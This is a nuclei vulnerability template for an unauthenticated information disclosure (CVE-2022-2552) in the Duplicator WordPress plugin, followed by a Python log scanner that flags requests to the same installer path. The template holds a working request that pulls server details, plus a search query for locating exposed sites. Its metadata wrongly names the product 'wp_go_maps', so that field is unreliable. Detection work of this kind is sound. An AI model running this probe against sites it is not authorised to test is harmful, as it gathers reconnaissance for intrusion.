Vulnerability Description
The Duplicator WordPress plugin before 1.4.7 does not authenticate or authorize visitors before displaying information about the system such as server software, PHP version and full file system path to the site.
id: CVE-2022-2552
info:
  name: Duplicator < 1.4.7.1 - Information Disclosure
  author: iamnoooob,ritikchaddha
  severity: medium
  description: |
    The Duplicator WordPress plugin before 1.4.7 does not authenticate or authorize visitors before displaying information about the system such as server software, php version and full file system path to the site.
  impact: |
    Unauthenticated attackers can access sensitive system information including server software versions, PHP version, and full filesystem paths through the exposed installer endpoint, providing valuable reconnaissance data for targeted attacks.
  remediation: |
    Update Duplicator plugin to version 1.4.7.1 or later that requires authentication before displaying system information.
  reference:
    - https://wpscan.com/vulnerability/6b540712-fda5-4be6-ae4b-bd30a9d9d698/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2552
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-2552
    cwe-id: CWE-862
    epss-score: 0.48527
    epss-percentile: 0.97652
    cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/wp-content/plugins/duplicator"
    vendor: snapcreek
    product: wp_go_maps
  tags: cve,cve2022,wp,wp-plugin,wordpress,duplicator,disclosure,vuln
http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?view=1"
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'SERVER DETAILS</div>'
          - 'Setup Information'
        condition: and
      - type: status
        status:
          - 200
# digest: 4a0a0047304502207507241df2839081d443dc406a564632a8ac66ad9b0f2bf128d7d28e0cd16cba022100bebe2af34da43821a0ac7f474be326dfc43c2fd57e47338cc162349296a61c15:922c64590222798bb761d5b6d8e72950
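
A defender-side counterpart to the template above, added here as an example and not part of the original template or the nuclei project: it scans web server access logs for requests to the same installer path and separates requests answered with 200 from those that were refused. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote

# Path requested by the template above; compared in lower case after decoding.
INSTALLER_PATH = "/wp-content/backups-dup-lite/dup-installer/main.installer.php"

# Assumed format: combined log, ip - user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def classify(line):
    """Return (ip, time, verdict) for installer requests, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Normalise percent-encoding and duplicate slashes before comparing paths.
    path = re.sub(r"/+", "/", unquote(urlsplit(m["target"]).path)).lower()
    if path != INSTALLER_PATH:
        return None
    # 200 corresponds to the template's status matcher; the body is not logged.
    verdict = "served" if m["status"] == "200" else "probe"
    return m["ip"], m["time"], verdict

def summarize(lines):
    """Group installer hits per client IP: {ip: {"served": n, "probe": n}}."""
    hits = defaultdict(lambda: {"served": 0, "probe": 0})
    for line in lines:
        result = classify(line)
        if result:
            hits[result[0]][result[2]] += 1
    return dict(hits)

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "GET /wp-content/backups-dup-lite/dup-installer/main.installer.php?view=1 HTTP/1.1" 200 18342 "-" "curl/8.0"',
    '198.51.100.4 - - [12/Mar/2024:10:05:40 +0000] "GET /wp-content/backups-dup-lite/dup-installer/main.installer.php?view=1 HTTP/1.1" 403 512 "-" "scanner"',
    '198.51.100.4 - - [12/Mar/2024:10:05:41 +0000] "GET /wp-content//backups-dup-lite/dup-installer/main%2Einstaller.php HTTP/1.1" 404 512 "-" "scanner"',
    '192.0.2.10 - - [12/Mar/2024:10:06:00 +0000] "GET /wp-login.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, counts in summarize(SAMPLE_LOG).items():
        print(ip, counts)
```

A `served` hit covers only the status half of the template's matchers, so treat it as a lead to verify on the host rather than as proof of disclosure.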